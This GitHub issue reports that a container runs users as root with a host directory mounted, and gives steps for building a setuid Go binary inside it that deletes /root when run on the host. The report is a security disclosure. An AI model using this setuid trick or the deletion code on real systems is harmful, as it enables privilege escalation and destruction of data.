Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

It is not safe to run the container with root user privileges without any restrictions. #4

Open
ansiz opened this issue Nov 14, 2018 · 1 comment
Open

It is not safe to run the container with root user privileges without any restrictions. #4

ansiz opened this issue Nov 14, 2018 · 1 comment

Comments

@ansiz
Copy link

ansiz commented Nov 14, 2018
edited
Loading

It is not safe to run the container with root user privileges without any restrictions. You mounted the host directory into container, and common user run as root in container, they can perform any dangerous operations with root privileges. For example:

  1. run a container
  2. build a program named hack, put it in the directory you mounted
  3. chmod +xs hack
  4. exit container
  5. cd to the directory, run this program

hack program code(in Golang):

package main

import "os"

func main() {
  os.RemoveAll("/root")
}

Use this code, common user can delete root directory, can also perform any dangerous operation in this way
@ansiz ansiz closed this as completed Nov 14, 2018
@ansiz ansiz reopened this Nov 14, 2018
@ansiz
Copy link
Author

ansiz commented Nov 14, 2018

I am also looking for a solution, I hope to discuss with you.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@ansiz